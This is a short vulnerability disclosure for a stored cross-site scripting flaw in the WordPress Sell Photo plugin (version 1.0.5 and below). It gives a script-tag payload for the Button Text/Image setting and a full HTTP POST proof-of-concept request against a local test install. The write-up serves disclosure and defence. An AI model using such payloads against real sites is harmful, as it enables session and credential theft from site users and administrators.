WordPress Sell Photo Plugin version 1.0.5 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
Summary
WordPress Sell Photo plugn is used to sell photos directly from WordPress blog with payment through PayPal. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
Vulnerability
The Button Text/Image
field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin.
The image below shows our javascript is being executed when the following string is given in the Button Text/Image
field.
Buy Now "><script>alert(0)</script>
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website.
Proof of Concept
POST /w/wp-admin/options-general.php?page=sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 339
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close
_wpnonce=14d5bbccf9&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dsell-photo-settings&enable_testmode=1&paypal_email=jajaja%40zopmail.com¤cy_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&return_url=http%3A%2F%2F95.217.19.38%2Fw&sell_photo_update_settings=Save+Changes
Recommendation
All users inputs should be sanitized before it is used.